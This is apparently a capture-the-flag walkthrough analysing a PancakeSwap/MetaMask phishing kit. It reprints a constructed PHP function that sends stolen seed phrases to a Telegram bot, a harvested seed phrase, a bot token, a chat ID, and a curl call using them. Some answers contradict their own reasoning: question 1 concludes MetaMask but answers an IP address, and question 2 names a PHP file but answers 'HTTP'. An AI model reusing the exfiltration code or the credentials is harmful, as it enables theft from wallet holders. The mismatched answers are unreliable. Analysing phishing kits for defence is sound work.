CyberDefenders: GrabThePhisher

An attacker compromised a server and impersonated https://pancakeswap.finance/, a decentralized exchange native to BNB Chain, to host a phishing kit at https://apankewk.soup.xyz/mainpage.php. The attacker set it as an open directory with the file name "pankewk.zip". Provided the phishing kit, you are requested to analyze it and do your threat intel homework.

Information

Category Name: GrabThePhisher

Files:
c75-GrabThePhisher.zip 792 KB


My Recommendations

Download it from CyberDefenders and verify it with:

sha1sum /path/to/c75-GrabThePhisher.zip

SHA1SUM: e9321eaca235a927d617cb896cd9bfaafa66d321

Walkthrough

1. Which wallet is used for asking the seed phrase?

We can grep the directory for seed:

				
					grep -r -i seed *
				
			

which returns two files: pankewk/metamask/index.html and
pankewk/src/networks.json. We can ‘pretty print’ the index.html with html2text:

				
					html2text pankewk/metamask/index.html
				
			

The wallet is MetaMask.

Answer: 10.0.5.15

2. What is the file name that has the code for the phishing kit?

There is only one PHP file in the kit, pankewk/metamask/metamask.php.

The code reads the submitted input and then sends a message through a Telegram bot containing the stolen credentials.

Answer: HTTP

3. In which language was the kit written?

Given the extension, and the contents of the file, the kit is written in PHP.

Answer: PHP

4. What service does the kit use to retrieve the victim's machine information?

The kit issues a request to the Spyex Geo API with the victim's remote address to look up its geographic location.

Answer: Spyex Geo

5. How many seed phrases were already collected?

The seed phrase is stored in the variable $text. The last line of the function sendTel shows that the seed phrase is appended to the file /log/log.txt each time the function runs.

Looking at the contents of /log/log.txt, there are three seed phrases.

Answer: 3


6. Write down the seed phrase of the most recent phishing incident?

The most recent seed phrase is the last line of the log.txt file, which is ‘father also recycle embody balance concert mechanic believe owner pair muffin hockey’.

Answer: father also recycle embody balance concert mechanic believe owner pair muffin hockey

7. Which medium had been used for credential dumping?

The function sendTel sends a message containing the credentials using a Telegram bot.

Answer: Telegram


8. What is the token for the channel?

The token is hard-coded in the sendTel function.

Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

9. What is the chat ID of the phisher's channel?

Again, the chat ID is hard-coded in the sendTel function.

Answer: 5442785564
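The answers to questions 5, 6, 8 and 9 all come from two artifacts in the kit: the hard-coded bot token and chat ID in sendTel, and the seed phrases appended to log/log.txt. The script below is an added triage example, not part of the challenge or the kit; the PHP fragment and the first two log lines are constructed (placeholder token and chat ID, arbitrary word lists), and only the last log line is the phrase from this walkthrough.

```python
import re

# Telegram bot tokens are "<numeric bot id>:<35 chars>"; chat IDs are numeric.
TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")
CHAT_ID_RE = re.compile(r"chat_id[\"']?\s*(?:=>|=|:)\s*[\"']?(-?\d{5,})", re.I)
# A 12- to 24-word lowercase word list, the shape of a BIP-39 seed phrase.
SEED_RE = re.compile(r"^[a-z]+(?: [a-z]+){11,23}$")

# Constructed PHP imitating a sendTel()-style exfiltration function.
# The token and chat ID below are placeholders, not values from any real kit.
KIT_PHP = """<?php
function sendTel($text) {
    $token = "1234567890:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi";
    $chat_id = "1122334455";
    file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat_id."&text=".urlencode($text));
    file_put_contents("log/log.txt", $text."\\n", FILE_APPEND);
}
"""

# Constructed log.txt: two arbitrary word lists plus the phrase from this writeup.
KIT_LOG = """abandon ability able about above absent absorb abstract absurd abuse access accident
zoo zone zero yellow year wrist wreck worth world work word wool
father also recycle embody balance concert mechanic believe owner pair muffin hockey
"""


def extract_c2(php_source):
    """Return (bot_token, chat_id) hard-coded in the kit; None where not found."""
    tok = TOKEN_RE.search(php_source)
    cid = CHAT_ID_RE.search(php_source)
    return (tok.group(1) if tok else None, cid.group(1) if cid else None)


def parse_log(log_text):
    """Return the seed phrases found in the kit's log, oldest first."""
    lines = (ln.strip() for ln in log_text.splitlines())
    return [ln for ln in lines if SEED_RE.match(ln)]


def triage(php_source, log_text):
    """Summarise the kit: exfil channel plus how many victims it already logged."""
    token, chat_id = extract_c2(php_source)
    phrases = parse_log(log_text)
    return {"token": token, "chat_id": chat_id,
            "count": len(phrases), "latest": phrases[-1] if phrases else None}


if __name__ == "__main__":
    print(triage(KIT_PHP, KIT_LOG))
```

Run against a real kit by reading its metamask.php and log/log.txt into the two arguments; the token and chat ID are what you would then hand to the Telegram getChat call in the next steps.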

10. What are the allies of the phish kit developer?

The phish kit writer kindly left a message to all the hustlers out there 🥰 🥰

He/she signed the message with ‘j1j1b1s@m3r0’

Answer: j1j1b1s@m3r0

11. What is the full name of the Phish Actor?

Now, we need to use the Telegram API with the provided information. The method needed is getChat.

				
					curl  https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564 | jq .
				
			

Answer: Marcus Aurelius

12. What is the username of the Phish Actor?

In the response to the request above, the username is pumpkinboii.

Answer: pumpkinboii

TLDR

– This challenge was easy and fun, and a good way to understand how PHP phishing websites are built and how the stolen information is then transferred to the attacker.
